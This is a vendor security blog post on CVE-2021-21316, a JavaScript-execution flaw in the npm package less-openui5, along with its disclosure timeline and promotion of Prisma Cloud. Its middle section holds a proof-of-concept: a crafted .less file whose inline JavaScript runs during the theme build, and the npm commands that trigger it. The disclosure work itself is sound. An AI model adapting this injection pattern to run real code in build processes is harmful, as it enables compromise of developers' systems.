* [Blog](https://origin-researchcenter.paloaltonetworks.com/blog)
* [Cloud Security](https://origin-researchcenter.paloaltonetworks.com/blog/cloud-security/)
* [Cloud Workload Protection Platform](https://origin-researchcenter.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/)
* From PRISMA-ID to CVE: Id...

# From PRISMA-ID to CVE: Identifying Open Source Vulnerabilities

[](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fcloud-security%2Fopen-source-vulnerabilities%2F)  
[](https://twitter.com/share?text=From+PRISMA-ID+to+CVE%3A+Identifying+Open+Source+Vulnerabilities&url=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fcloud-security%2Fopen-source-vulnerabilities%2F)  
[](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fcloud-security%2Fopen-source-vulnerabilities%2F&title=From+PRISMA-ID+to+CVE%3A+Identifying+Open+Source+Vulnerabilities&summary=&source=)  
[](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://origin-researchcenter.paloaltonetworks.com/blog/cloud-security/open-source-vulnerabilities/&ts=markdown)  
\[\](mailto:?subject=From PRISMA-ID to CVE: Identifying Open Source Vulnerabilities)  
Link copied  
By [Shaul Ben Hai](https://www.paloaltonetworks.com/blog/author/shaul-ben-hai/?ts=markdown "Posts by Shaul Ben Hai")  
Jul 23, 2021  
4 minutes  
[Cloud Workload Protection Platform](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/?ts=markdown)  
[Data Security](https://www.paloaltonetworks.com/blog/category/data-security/?ts=markdown)  
[CVE](https://www.paloaltonetworks.com/blog/tag/cve/?ts=markdown)  
[Open Source](https://www.paloaltonetworks.com/blog/tag/open-source/?ts=markdown)  
[Vulnerability Management](https://www.paloaltonetworks.com/blog/tag/vulnerability-management/?ts=markdown)

## Executive Summary

Open source code experienced tremendous growth in recent years and is used by companies from all kinds of different industries. Time, money, rapid development, development life cycles, and innovation are only a partial list of the reasons why open-source frameworks and libraries have become so popular and adopted by many developers. The use of open-source frameworks and libraries grew by dozens of percent compared to the previous year and is expected to continue to expand. Open-source adoption creates new security challenges for software developers since many developers take code from open source libraries and deploy it. Most developers are unaware of the number of dependencies that are deployed and how many security issues or even well-documented open source vulnerabilities exist.

Vulnerabilities in open source frameworks and libraries are not always reported to NVD and even once reported, the process could take a long time until they are added to the feed. The time between the first public disclosure of a vulnerability and its addition to the NVD can take days and in some cases even several weeks.

In this blog post, I will discuss an open-source vulnerability that was found 17 days before it became an official CVE and demonstrate how it could have been exploited.

## The Vulnerability

less-openui5 is an npm open-source package that enables building OpenUI5 themes with Less.js. Before version 0.10., JavaScript code could be executed in the context of the build process when processing theming resources (i.e. \*.less files) with less-openui5. An attacker could create a library or themes containing malicious JavaScript code in one of the .less files.

##### What is `.less`?

Less (Leaner Style Sheets) is a cross-browser style sheet language. It extends the capability of CSS (Cascading Style Sheets) and can be compiled into CSS and run on the client-side or server-side.
[![Exploitation proof of concept](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/10/Exploit-.less_.png)](https://youtu.be/vDPlNwaDY4E) Click to watch a video of the exploitation proof of concept

Once less-openui5 version 0.10.0 Parser option javascriptEnabled existed, it was possible to enable JavaScript execution in less.js files. The vulnerable code performs JavaScript evaluation to the .less file content if a ternary condition takes place:

`e: function (str) {`

`return new(tree.Anonymous)(str instanceof tree.JavaScript ? str.evaluated : str);`

According to that I created a simple malicious .less file:

`.rule {`

```@var: ``(function(){console.log('Pwn by Unit42'); process.exit(0);})()``;```

`color: @var;`

`}`
![Creating the malicious file](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/07/word-image-39.png)
Creating the malicious file

Now, I can install and include the vulnerable version of the package:

`npm install less-openui5@0.9.0`

`var lessOpenUI5 = require('less-openui5')`

Create builder instance:

`var builder = new lessOpenUI5.Builder()`

Start the Build process to build some theme (I used lessInputPath instead of lessInput to specify a file from my computer):

`builder.build({lessInputPath: '/Users/sbenhai/exploit.less'});`

`Promise { <pending> }`

`> Pwn by Unit42`
![Installing and including the vulnerable version of the package](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/07/word-image-40.png)
Installing and including the vulnerable version of the package

## Prisma Cloud Detects Vulnerabilities Fast

On January 29th, 2021, less-openui5 released v0.10.0 with a security fix that disables JavaScript execution in Less.js. Parser option javascriptEnabled has been removed. JavaScript is then always disabled and cannot be enabled.

On January 30th, Prisma Cloud caught this security fix and created a candidate for possible vulnerability issues. Prisma Cloud researchers immediately identified the vulnerability and the vulnerable code and assigned a new PRISMA-ID for Prisma Cloud customers.

On February 16th this vulnerability became CVE-2021-21316, and was published by NVD. Prisma Cloud customers benefited from early detection of this vulnerability, in this case 17 days before this vulnerability was published by official NVD feeds. It should be noted that Prisma Cloud encourages open source maintainers to release CVEs in a timely manner. However, sometimes vulnerabilities are released to the public in the form of advisories, issues or PRs before a CVE has been published, and PRISMA IDs were created to provide protections to Prisma Cloud users in the interim.

## How Prisma Cloud Protects You

Unit 42 researchers actively monitor and search for open source vulnerabilities at open-source frameworks and libraries source code, commits, and discussion using a variety of methods and tools.

Unit 42 researchers detect new vulnerabilities that were only recently disclosed and even vulnerabilities that were quietly patched. They then identify vulnerabilities that Prisma Cloud customers need to be aware of, and create an internal CVE, PRISMA-ID. Unit 42 researchers continue to monitor and track open-source libraries and once a CVE is assigned, the CVE will take over the PRISMA-ID. To learn more about this, check out our [blog post about open source vulnerability management](http://paloaltonetworks.com/blog/prisma-cloud/open-source-vulnerability-management).

*** ** * ** ***

## Related Blogs

### [Cloud Workload Protection Platform](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/?ts=markdown), [Secure the Cloud](https://www.paloaltonetworks.com/blog/category/secure-the-cloud/?ts=markdown)

[#### Managing Vulnerabilities in Unstable Releases and Cutting-Edge Packages With Prisma Cloud](https://origin-researchcenter.paloaltonetworks.com/blog/cloud-security/securing-unstable-releases/)

### [CAS](https://www.paloaltonetworks.com/blog/cloud-security/category/cas/?ts=markdown), [Cloud Workload Protection Platform](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown)

[#### Elevate Cybersecurity with PRISMA IDs](https://origin-researchcenter.paloaltonetworks.com/blog/cloud-security/prisma-ids-vulnerability-management/)

### [Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/?ts=markdown), [Cloud Workload Protection Platform](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/?ts=markdown)

[#### Open Source Vulnerability Management for Cloud Security](https://origin-researchcenter.paloaltonetworks.com/blog/cloud-security/open-source-vulnerability-management/)

### [API Security](https://www.paloaltonetworks.com/blog/cloud-security/category/api-security/?ts=markdown), [Application Security](https://www.paloaltonetworks.com/blog/cloud-security/category/application-security/?ts=markdown), [Cloud Workload Protection](https://www.paloaltonetworks.com/blog/category/cloud-workload-protection/?ts=markdown), [Cloud Workload Protection Platform](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/?ts=markdown), [Code Security](https://www.paloaltonetworks.com/blog/cloud-security/category/code-security/?ts=markdown), [Code to Cloud](https://www.paloaltonetworks.com/blog/cloud-security/category/code-to-cloud/?ts=markdown)

[#### API Security and Threat Intelligence Reduce Attack Surface in Prisma Cloud Workload Protection Release](https://origin-researchcenter.paloaltonetworks.com/blog/cloud-security/api-security-threat-intel-reduce-attack-surface/)

### [Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/?ts=markdown), [Cloud Workload Protection Platform](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/?ts=markdown)

[#### Cloud Vulnerability Management for Hosts](https://origin-researchcenter.paloaltonetworks.com/blog/cloud-security/cloud-vulnerability-management/)

### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Cloud Posture Security](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-security-posture-management/?ts=markdown), [Cloud Workload Protection Platform](https://www.paloaltonetworks.com/blog/cloud-security/category/cloud-workload-protection-platform/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown)

[#### Prisma Cloud: Leader in the GigaOm Radar for Vulnerability Management](https://origin-researchcenter.paloaltonetworks.com/blog/2021/05/cloud-leader-in-gigaom-radar-vulnerability-management/)

### Subscribe to Cloud Security Blogs!

Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more.
![spinner](https://origin-researchcenter.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up  
Please enter a valid email.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder.  
This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.  
{#footer} {#footer}

## Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown)

* [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown)

* [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown)

## Company

* [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown)
* [Careers](https://jobs.paloaltonetworks.com/en/)
* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown)
* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown)
* [Customers](https://www.paloaltonetworks.com/customers?ts=markdown)
* [Investor Relations](https://investors.paloaltonetworks.com/)
* [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown)
* [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown)

## Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown)
* [Communities](https://www.paloaltonetworks.com/communities?ts=markdown)
* [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown)
* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown)
* [Event Center](https://events.paloaltonetworks.com/)
* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)
* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown)
* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown)
* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown)
* [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown)
* [Tech Docs](https://docs.paloaltonetworks.com/)
* [Unit 42](https://unit42.paloaltonetworks.com/)
* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)
* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown)
* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown)
* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown)
* [Documents](https://www.paloaltonetworks.com/legal?ts=markdown)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language